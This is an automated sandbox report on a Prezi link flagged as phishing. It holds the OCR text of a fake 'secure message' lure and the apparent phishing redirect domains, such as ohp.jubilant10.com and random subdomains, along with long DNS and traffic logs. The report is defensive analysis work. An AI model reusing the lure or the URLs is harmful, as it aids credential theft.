Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
https://prezi.com/i/amopqalyrbyv/

Overview

General Information

Sample URL:https://prezi.com/i/amopqalyrbyv/
Analysis ID:1550401

Detection

Score:48
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

AI detected landing page (webpage, office document or email)
Phishing site or detected (based on various text indicators)
HTML page contains hidden javascript code
Stores files to the Windows start menu directory

Classification

  • System is w10x64_ra
  • chrome.exe (PID: 6252 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" MD5: 83395EAB5B03DEA9720F8D7AC0D15CAA)
    • chrome.exe (PID: 6500 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2100 --field-trial-handle=2020,i,12109441241390302086,6426292447797102329,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 83395EAB5B03DEA9720F8D7AC0D15CAA)
  • chrome.exe (PID: 7128 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://prezi.com/i/amopqalyrbyv/" MD5: 83395EAB5B03DEA9720F8D7AC0D15CAA)
  • cleanup
No yara matches
No Sigma rule has matched
No Suricata rule has matched

Click to jump to signature section

Show All Signature Results

Phishing

barindex
Source: Chrome DOM: 1.7OCR Text: A Secure Message Has Just been sent for your review. The message was sent securely to protect sensitive information included in the correspondence. Reference: SPG76389 Date: 11 01 2024 Number of Pages: 3 Status: Successful CLICK HERE TO VIEW DOCUMENTS ONLINE
Source: https://www.asos.com/HTTP Parser: Base64 decoded: <svg width="80" height="24" xmlns="http://www.w3.org/2000/svg"><symbol id="a" viewBox="0 0 23 24"><path d="M5.076 12.017c0-3.814 2.328-7.509 6.521-7.509 4.194 0 6.522 3.695 6.522 7.51 0 10.098-13.043 10.095-13.043 0Zm17.918-7.521V.603h-4.875v1.514C16.127....
Source: https://prezi.com/i/amopqalyrbyv/jennifer-zisk-vitron-msw-lsw/HTTP Parser: Iframe src: //www.googletagmanager.com/ns.html?id=GTM-MQ6FG2
Source: https://prezi.com/i/amopqalyrbyv/jennifer-zisk-vitron-msw-lsw/HTTP Parser: Iframe src: //www.googletagmanager.com/ns.html?id=GTM-MQ6FG2
Source: https://prezi.com/i/amopqalyrbyv/jennifer-zisk-vitron-msw-lsw/HTTP Parser: Iframe src: https://td.doubleclick.net/td/rul/1001687149?random=1730910098524&cv=11&fst=1730910098524&fmt=3&bg=ffffff&guid=ON&async=1&gtm=45be4au0v892644071z86358348za200zb6358348&gcd=13r3r3l3l5l1&dma=0&tag_exp=101823848~101878899~101878944~101925629&u_w=1280&u_h=1024&url=https%3A%2F%2Fprezi.com%2Fi%2Famopqalyrbyv%2Fjennifer-zisk-vitron-msw-lsw%2F&hn=www.googleadservices.com&frm=0&tiba=Jennifer%20Zisk-Vitron%2C%20MSW%2C%20LSW%20by%20Secure%20Bill%20on%20Prezi%20Design&npa=0&pscdl=noapi&uaa=x86&uab=64&uafvl=Google%2520Chrome%3B117.0.5938.149%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.149&uamb=0&uam=&uap=Windows&uapv=10.0.0&uaw=0&fdr=AQ&auid=887411132.1730910099&fledge=1&data=event%3Dgtag.config
Source: https://prezi.com/i/amopqalyrbyv/jennifer-zisk-vitron-msw-lsw/HTTP Parser: Iframe src: https://td.doubleclick.net/td/rul/AW-958692981?random=1730910100389&cv=11&fst=1730910100389&fmt=3&bg=ffffff&guid=ON&async=1&gtm=45be4au0z86358348za201zb6358348&gcd=13r3r3l3l5l1&dma=0&tag_exp=101823848~101878899~101878944~101925629&u_w=1280&u_h=1024&url=https%3A%2F%2Fprezi.com%2Fi%2Famopqalyrbyv%2Fjennifer-zisk-vitron-msw-lsw%2F&hn=www.googleadservices.com&frm=0&tiba=Jennifer%20Zisk-Vitron%2C%20MSW%2C%20LSW%20by%20Secure%20Bill%20on%20Prezi%20Design&npa=0&pscdl=noapi&auid=887411132.1730910099&uaa=x86&uab=64&uafvl=Google%2520Chrome%3B117.0.5938.149%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.149&uamb=0&uam=&uap=Windows&uapv=10.0.0&uaw=0&fledge=1&data=ads_data_redaction%3Dfalse
Source: https://prezi.com/i/amopqalyrbyv/jennifer-zisk-vitron-msw-lsw/HTTP Parser: Iframe src: https://td.doubleclick.net/td/rul/1001687149?random=1730910100421&cv=11&fst=1730910100421&fmt=3&bg=ffffff&guid=ON&async=1&gtm=45be4au0v892644071z86358348za201zb6358348&gcd=13r3r3l3l5l1&dma=0&tag_exp=101823848~101878899~101878944~101925629&u_w=1280&u_h=1024&url=https%3A%2F%2Fprezi.com%2Fi%2Famopqalyrbyv%2Fjennifer-zisk-vitron-msw-lsw%2F&label=b1TSCIv8tAUQ7ZDS3QM&hn=www.googleadservices.com&frm=0&tiba=Jennifer%20Zisk-Vitron%2C%20MSW%2C%20LSW%20by%20Secure%20Bill%20on%20Prezi%20Design&npa=0&pscdl=noapi&auid=887411132.1730910099&uaa=x86&uab=64&uafvl=Google%2520Chrome%3B117.0.5938.149%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.149&uamb=0&uam=&uap=Windows&uapv=10.0.0&uaw=0&fledge=1&data=ads_data_redaction%3Dfalse
Source: https://prezi.com/i/amopqalyrbyv/jennifer-zisk-vitron-msw-lsw/HTTP Parser: Iframe src: https://td.doubleclick.net/td/ga/rul?tid=G-N6JQLWRW1C&gacid=616120628.1730910100&gtm=45je4au0v9115191345z86358348za200zb6358348&dma=0&gcs=G111&gcd=13r3r3l3l5l1&npa=0&pscdl=noapi&aip=1&fledge=1&frm=0&tag_exp=101823848~101878899~101878944~101925629&z=1192927045
Source: https://prezi.com/i/amopqalyrbyv/jennifer-zisk-vitron-msw-lsw/HTTP Parser: Iframe src: https://js.stripe.com/v3/m-outer-3437aaddcdf6922d623e172c2d6f9278.html#url=https%3A%2F%2Fprezi.com%2Fi%2Famopqalyrbyv%2Fjennifer-zisk-vitron-msw-lsw%2F&title=Jennifer%20Zisk-Vitron%2C%20MSW%2C%20LSW%20by%20Secure%20Bill%20on%20Prezi%20Design&referrer=&muid=NA&sid=NA&version=6&preview=false
Source: https://prezi.com/i/amopqalyrbyv/jennifer-zisk-vitron-msw-lsw/HTTP Parser: Iframe src: //www.googletagmanager.com/ns.html?id=GTM-MQ6FG2
Source: https://prezi.com/i/amopqalyrbyv/jennifer-zisk-vitron-msw-lsw/HTTP Parser: Iframe src: https://td.doubleclick.net/td/rul/1001687149?random=1730910098524&cv=11&fst=1730910098524&fmt=3&bg=ffffff&guid=ON&async=1&gtm=45be4au0v892644071z86358348za200zb6358348&gcd=13r3r3l3l5l1&dma=0&tag_exp=101823848~101878899~101878944~101925629&u_w=1280&u_h=1024&url=https%3A%2F%2Fprezi.com%2Fi%2Famopqalyrbyv%2Fjennifer-zisk-vitron-msw-lsw%2F&hn=www.googleadservices.com&frm=0&tiba=Jennifer%20Zisk-Vitron%2C%20MSW%2C%20LSW%20by%20Secure%20Bill%20on%20Prezi%20Design&npa=0&pscdl=noapi&uaa=x86&uab=64&uafvl=Google%2520Chrome%3B117.0.5938.149%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.149&uamb=0&uam=&uap=Windows&uapv=10.0.0&uaw=0&fdr=AQ&auid=887411132.1730910099&fledge=1&data=event%3Dgtag.config
Source: https://prezi.com/i/amopqalyrbyv/jennifer-zisk-vitron-msw-lsw/HTTP Parser: Iframe src: https://td.doubleclick.net/td/rul/AW-958692981?random=1730910100389&cv=11&fst=1730910100389&fmt=3&bg=ffffff&guid=ON&async=1&gtm=45be4au0z86358348za201zb6358348&gcd=13r3r3l3l5l1&dma=0&tag_exp=101823848~101878899~101878944~101925629&u_w=1280&u_h=1024&url=https%3A%2F%2Fprezi.com%2Fi%2Famopqalyrbyv%2Fjennifer-zisk-vitron-msw-lsw%2F&hn=www.googleadservices.com&frm=0&tiba=Jennifer%20Zisk-Vitron%2C%20MSW%2C%20LSW%20by%20Secure%20Bill%20on%20Prezi%20Design&npa=0&pscdl=noapi&auid=887411132.1730910099&uaa=x86&uab=64&uafvl=Google%2520Chrome%3B117.0.5938.149%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.149&uamb=0&uam=&uap=Windows&uapv=10.0.0&uaw=0&fledge=1&data=ads_data_redaction%3Dfalse
Source: https://prezi.com/i/amopqalyrbyv/jennifer-zisk-vitron-msw-lsw/HTTP Parser: Iframe src: https://td.doubleclick.net/td/rul/1001687149?random=1730910100421&cv=11&fst=1730910100421&fmt=3&bg=ffffff&guid=ON&async=1&gtm=45be4au0v892644071z86358348za201zb6358348&gcd=13r3r3l3l5l1&dma=0&tag_exp=101823848~101878899~101878944~101925629&u_w=1280&u_h=1024&url=https%3A%2F%2Fprezi.com%2Fi%2Famopqalyrbyv%2Fjennifer-zisk-vitron-msw-lsw%2F&label=b1TSCIv8tAUQ7ZDS3QM&hn=www.googleadservices.com&frm=0&tiba=Jennifer%20Zisk-Vitron%2C%20MSW%2C%20LSW%20by%20Secure%20Bill%20on%20Prezi%20Design&npa=0&pscdl=noapi&auid=887411132.1730910099&uaa=x86&uab=64&uafvl=Google%2520Chrome%3B117.0.5938.149%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.149&uamb=0&uam=&uap=Windows&uapv=10.0.0&uaw=0&fledge=1&data=ads_data_redaction%3Dfalse
Source: https://prezi.com/i/amopqalyrbyv/jennifer-zisk-vitron-msw-lsw/HTTP Parser: Iframe src: https://td.doubleclick.net/td/ga/rul?tid=G-N6JQLWRW1C&gacid=616120628.1730910100&gtm=45je4au0v9115191345z86358348za200zb6358348&dma=0&gcs=G111&gcd=13r3r3l3l5l1&npa=0&pscdl=noapi&aip=1&fledge=1&frm=0&tag_exp=101823848~101878899~101878944~101925629&z=1192927045
Source: https://prezi.com/i/amopqalyrbyv/jennifer-zisk-vitron-msw-lsw/HTTP Parser: Iframe src: https://js.stripe.com/v3/m-outer-3437aaddcdf6922d623e172c2d6f9278.html#url=https%3A%2F%2Fprezi.com%2Fi%2Famopqalyrbyv%2Fjennifer-zisk-vitron-msw-lsw%2F&title=Jennifer%20Zisk-Vitron%2C%20MSW%2C%20LSW%20by%20Secure%20Bill%20on%20Prezi%20Design&referrer=&muid=NA&sid=NA&version=6&preview=false
Source: https://prezi.com/i/amopqalyrbyv/jennifer-zisk-vitron-msw-lsw/HTTP Parser: Iframe src: //www.googletagmanager.com/ns.html?id=GTM-MQ6FG2
Source: https://prezi.com/i/amopqalyrbyv/jennifer-zisk-vitron-msw-lsw/HTTP Parser: Iframe src: https://td.doubleclick.net/td/rul/1001687149?random=1730910098524&cv=11&fst=1730910098524&fmt=3&bg=ffffff&guid=ON&async=1&gtm=45be4au0v892644071z86358348za200zb6358348&gcd=13r3r3l3l5l1&dma=0&tag_exp=101823848~101878899~101878944~101925629&u_w=1280&u_h=1024&url=https%3A%2F%2Fprezi.com%2Fi%2Famopqalyrbyv%2Fjennifer-zisk-vitron-msw-lsw%2F&hn=www.googleadservices.com&frm=0&tiba=Jennifer%20Zisk-Vitron%2C%20MSW%2C%20LSW%20by%20Secure%20Bill%20on%20Prezi%20Design&npa=0&pscdl=noapi&uaa=x86&uab=64&uafvl=Google%2520Chrome%3B117.0.5938.149%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.149&uamb=0&uam=&uap=Windows&uapv=10.0.0&uaw=0&fdr=AQ&auid=887411132.1730910099&fledge=1&data=event%3Dgtag.config
Source: https://prezi.com/i/amopqalyrbyv/jennifer-zisk-vitron-msw-lsw/HTTP Parser: Iframe src: https://td.doubleclick.net/td/rul/AW-958692981?random=1730910100389&cv=11&fst=1730910100389&fmt=3&bg=ffffff&guid=ON&async=1&gtm=45be4au0z86358348za201zb6358348&gcd=13r3r3l3l5l1&dma=0&tag_exp=101823848~101878899~101878944~101925629&u_w=1280&u_h=1024&url=https%3A%2F%2Fprezi.com%2Fi%2Famopqalyrbyv%2Fjennifer-zisk-vitron-msw-lsw%2F&hn=www.googleadservices.com&frm=0&tiba=Jennifer%20Zisk-Vitron%2C%20MSW%2C%20LSW%20by%20Secure%20Bill%20on%20Prezi%20Design&npa=0&pscdl=noapi&auid=887411132.1730910099&uaa=x86&uab=64&uafvl=Google%2520Chrome%3B117.0.5938.149%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.149&uamb=0&uam=&uap=Windows&uapv=10.0.0&uaw=0&fledge=1&data=ads_data_redaction%3Dfalse
Source: https://prezi.com/i/amopqalyrbyv/jennifer-zisk-vitron-msw-lsw/HTTP Parser: Iframe src: https://td.doubleclick.net/td/rul/1001687149?random=1730910100421&cv=11&fst=1730910100421&fmt=3&bg=ffffff&guid=ON&async=1&gtm=45be4au0v892644071z86358348za201zb6358348&gcd=13r3r3l3l5l1&dma=0&tag_exp=101823848~101878899~101878944~101925629&u_w=1280&u_h=1024&url=https%3A%2F%2Fprezi.com%2Fi%2Famopqalyrbyv%2Fjennifer-zisk-vitron-msw-lsw%2F&label=b1TSCIv8tAUQ7ZDS3QM&hn=www.googleadservices.com&frm=0&tiba=Jennifer%20Zisk-Vitron%2C%20MSW%2C%20LSW%20by%20Secure%20Bill%20on%20Prezi%20Design&npa=0&pscdl=noapi&auid=887411132.1730910099&uaa=x86&uab=64&uafvl=Google%2520Chrome%3B117.0.5938.149%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.149&uamb=0&uam=&uap=Windows&uapv=10.0.0&uaw=0&fledge=1&data=ads_data_redaction%3Dfalse
Source: https://prezi.com/i/amopqalyrbyv/jennifer-zisk-vitron-msw-lsw/HTTP Parser: Iframe src: https://td.doubleclick.net/td/ga/rul?tid=G-N6JQLWRW1C&gacid=616120628.1730910100&gtm=45je4au0v9115191345z86358348za200zb6358348&dma=0&gcs=G111&gcd=13r3r3l3l5l1&npa=0&pscdl=noapi&aip=1&fledge=1&frm=0&tag_exp=101823848~101878899~101878944~101925629&z=1192927045
Source: https://prezi.com/i/amopqalyrbyv/jennifer-zisk-vitron-msw-lsw/HTTP Parser: Iframe src: https://js.stripe.com/v3/m-outer-3437aaddcdf6922d623e172c2d6f9278.html#url=https%3A%2F%2Fprezi.com%2Fi%2Famopqalyrbyv%2Fjennifer-zisk-vitron-msw-lsw%2F&title=Jennifer%20Zisk-Vitron%2C%20MSW%2C%20LSW%20by%20Secure%20Bill%20on%20Prezi%20Design&referrer=&muid=NA&sid=NA&version=6&preview=false
Source: https://prezi.com/i/amopqalyrbyv/jennifer-zisk-vitron-msw-lsw/HTTP Parser: No favicon
Source: https://prezi.com/i/amopqalyrbyv/jennifer-zisk-vitron-msw-lsw/HTTP Parser: No favicon
Source: https://prezi.com/i/amopqalyrbyv/jennifer-zisk-vitron-msw-lsw/HTTP Parser: No favicon
Source: https://ohp.jubilant10.com/9AcwW8rx6XRE_VpnT9ifNcc/HTTP Parser: No favicon
Source: https://ohp.jubilant10.com/9AcwW8rx6XRE_VpnT9ifNcc/HTTP Parser: No favicon
Source: https://www.sephora.com/HTTP Parser: No favicon
Source: https://ohp.jubilant10.com/9AcwW8rx6XRE_VpnT9ifNcc/HTTP Parser: No favicon
Source: https://www.sephora.com/HTTP Parser: No favicon
Source: https://prezi.com/i/amopqalyrbyv/jennifer-zisk-vitron-msw-lsw/HTTP Parser: No <meta name="author".. found
Source: https://prezi.com/i/amopqalyrbyv/jennifer-zisk-vitron-msw-lsw/HTTP Parser: No <meta name="author".. found
Source: https://prezi.com/i/amopqalyrbyv/jennifer-zisk-vitron-msw-lsw/HTTP Parser: No <meta name="author".. found
Source: https://prezi.com/i/amopqalyrbyv/jennifer-zisk-vitron-msw-lsw/HTTP Parser: No <meta name="author".. found
Source: https://prezi.com/i/amopqalyrbyv/jennifer-zisk-vitron-msw-lsw/HTTP Parser: No <meta name="copyright".. found
Source: https://prezi.com/i/amopqalyrbyv/jennifer-zisk-vitron-msw-lsw/HTTP Parser: No <meta name="copyright".. found
Source: https://prezi.com/i/amopqalyrbyv/jennifer-zisk-vitron-msw-lsw/HTTP Parser: No <meta name="copyright".. found
Source: https://prezi.com/i/amopqalyrbyv/jennifer-zisk-vitron-msw-lsw/HTTP Parser: No <meta name="copyright".. found
Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.17:49712 version: TLS 1.2
Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.17:49721 version: TLS 1.2
Source: unknownHTTPS traffic detected: 20.12.23.50:443 -> 192.168.2.17:49802 version: TLS 1.2
Source: unknownHTTPS traffic detected: 20.12.23.50:443 -> 192.168.2.17:50029 version: TLS 1.2
Source: unknownHTTPS traffic detected: 13.107.5.88:443 -> 192.168.2.17:50115 version: TLS 1.2
Source: unknownHTTPS traffic detected: 40.126.32.133:443 -> 192.168.2.17:50113 version: TLS 1.2
Source: unknownHTTPS traffic detected: 2.23.209.158:443 -> 192.168.2.17:50117 version: TLS 1.2
Source: chrome.exeMemory has grown: Private usage: 1MB later: 28MB
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.13
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.13
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.13
Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.13
Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.13
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficDNS traffic detected: DNS query: prezi.com
Source: global trafficDNS traffic detected: DNS query: cdn.cookielaw.org
Source: global trafficDNS traffic detected: DNS query: package-bundles.prezi.com
Source: global trafficDNS traffic detected: DNS query: assets.prezicdn.net
Source: global trafficDNS traffic detected: DNS query: prezi-analytics.com
Source: global trafficDNS traffic detected: DNS query: assets1.prezicdn.net
Source: global trafficDNS traffic detected: DNS query: geolocation.onetrust.com
Source: global trafficDNS traffic detected: DNS query: www.google.com
Source: global trafficDNS traffic detected: DNS query: js.stripe.com
Source: global trafficDNS traffic detected: DNS query: bandar-logger.prezi.com
Source: global trafficDNS traffic detected: DNS query: cdn-prezi.jifo.co
Source: global trafficDNS traffic detected: DNS query: d2pj2twnjx3fya.cloudfront.net
Source: global trafficDNS traffic detected: DNS query: google.com
Source: global trafficDNS traffic detected: DNS query: googleads.g.doubleclick.net
Source: global trafficDNS traffic detected: DNS query: td.doubleclick.net
Source: global trafficDNS traffic detected: DNS query: snap.licdn.com
Source: global trafficDNS traffic detected: DNS query: cdn.taboola.com
Source: global trafficDNS traffic detected: DNS query: connect.facebook.net
Source: global trafficDNS traffic detected: DNS query: js.hs-scripts.com
Source: global trafficDNS traffic detected: DNS query: analytics.tiktok.com
Source: global trafficDNS traffic detected: DNS query: psb.taboola.com
Source: global trafficDNS traffic detected: DNS query: trc.taboola.com
Source: global trafficDNS traffic detected: DNS query: px.ads.linkedin.com
Source: global trafficDNS traffic detected: DNS query: analytics.google.com
Source: global trafficDNS traffic detected: DNS query: js.hs-analytics.net
Source: global trafficDNS traffic detected: DNS query: js.hs-banner.com
Source: global trafficDNS traffic detected: DNS query: trc-events.taboola.com
Source: global trafficDNS traffic detected: DNS query: stats.g.doubleclick.net
Source: global trafficDNS traffic detected: DNS query: track.hubspot.com
Source: global trafficDNS traffic detected: DNS query: pips.taboola.com
Source: global trafficDNS traffic detected: DNS query: www.facebook.com
Source: global trafficDNS traffic detected: DNS query: www.linkedin.com
Source: global trafficDNS traffic detected: DNS query: cds.taboola.com
Source: global trafficDNS traffic detected: DNS query: m.stripe.network
Source: global trafficDNS traffic detected: DNS query: prezigram-assets.prezicdn.net
Source: global trafficDNS traffic detected: DNS query: ohp.jubilant10.com
Source: global trafficDNS traffic detected: DNS query: code.jquery.com
Source: global trafficDNS traffic detected: DNS query: challenges.cloudflare.com
Source: global trafficDNS traffic detected: DNS query: cdnjs.cloudflare.com
Source: global trafficDNS traffic detected: DNS query: m.stripe.com
Source: global trafficDNS traffic detected: DNS query: stripe.com
Source: global trafficDNS traffic detected: DNS query: p6jxo9bkndjpbsiorlfxmbhwxbuxwqetaeiowr4duumwcvnoj91x.belonfal.com
Source: global trafficDNS traffic detected: DNS query: www.asos.com
Source: global trafficDNS traffic detected: DNS query: content.asos-media.com
Source: global trafficDNS traffic detected: DNS query: images.asos-media.com
Source: global trafficDNS traffic detected: DNS query: www.asos-video.com
Source: global trafficDNS traffic detected: DNS query: assets.asosservices.com
Source: global trafficDNS traffic detected: DNS query: res.cloudinary.com
Source: global trafficDNS traffic detected: DNS query: cdn.optimizely.com
Source: global trafficDNS traffic detected: DNS query: my.asos.com
Source: global trafficDNS traffic detected: DNS query: ci.asosservices.com
Source: global trafficDNS traffic detected: DNS query: s2.go-mpulse.net
Source: global trafficDNS traffic detected: DNS query: creativeassets.asosservices.com
Source: global trafficDNS traffic detected: DNS query: resources.asosservices.com
Source: global trafficDNS traffic detected: DNS query: dpm.demdex.net
Source: global trafficDNS traffic detected: DNS query: c.go-mpulse.net
Source: global trafficDNS traffic detected: DNS query: asos.demdex.net
Source: global trafficDNS traffic detected: DNS query: metrics.asos.com
Source: global trafficDNS traffic detected: DNS query: www.asosglobal.com
Source: global trafficDNS traffic detected: DNS query: reporting.go-mpulse.net
Source: global trafficDNS traffic detected: DNS query: a.nel.cloudflare.com
Source: global trafficDNS traffic detected: DNS query: apbqrjhmudzxqujc0mfaeugbu2kfxg3raxvemzkyauzfcu9pml9fujy3fg.ndshalox.com
Source: global trafficDNS traffic detected: DNS query: www.sephora.com
Source: global trafficDNS traffic detected: DNS query: community.sephora.com
Source: global trafficDNS traffic detected: DNS query: ju9jakkaoumuzm8sin6wwcxb6gmzhr5hvnqxopdcjsgb8bbuyjrdofootuuv.diblethe.com
Source: global trafficDNS traffic detected: DNS query: cnstrc.com
Source: global trafficDNS traffic detected: DNS query: e309da9b9aaf.cdn4.forter.com
Source: global trafficDNS traffic detected: DNS query: js-cdn.dynatrace.com
Source: global trafficDNS traffic detected: DNS query: api.bluecore.com
Source: global trafficDNS traffic detected: DNS query: sephora-track.inside-graph.com
Source: global trafficDNS traffic detected: DNS query: assets.adobedtm.com
Source: global trafficDNS traffic detected: DNS query: sephora.demdex.net
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49865
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
Source: unknownNetwork traffic detected: HTTP traffic on port 49817 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49864
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49863
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49862
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49861
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49982
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49860
Source: unknownNetwork traffic detected: HTTP traffic on port 49932 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49875 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49852 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49795 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50131 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49990 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49859
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49858
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49979
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49857
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49978
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49856
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49855
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49854
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49975
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49853
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49974
Source: unknownNetwork traffic detected: HTTP traffic on port 50085 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49852
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49973
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49851
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49972
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49850
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49971
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49970
Source: unknownNetwork traffic detected: HTTP traffic on port 49967 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49703 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49784 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50074 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50107 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49909 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49806 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49729
Source: unknownNetwork traffic detected: HTTP traffic on port 49943 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49728
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49849
Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49727
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49969
Source: unknownNetwork traffic detected: HTTP traffic on port 49978 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49726
Source: unknownNetwork traffic detected: HTTP traffic on port 49886 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49968
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49725
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49967
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49724
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49966
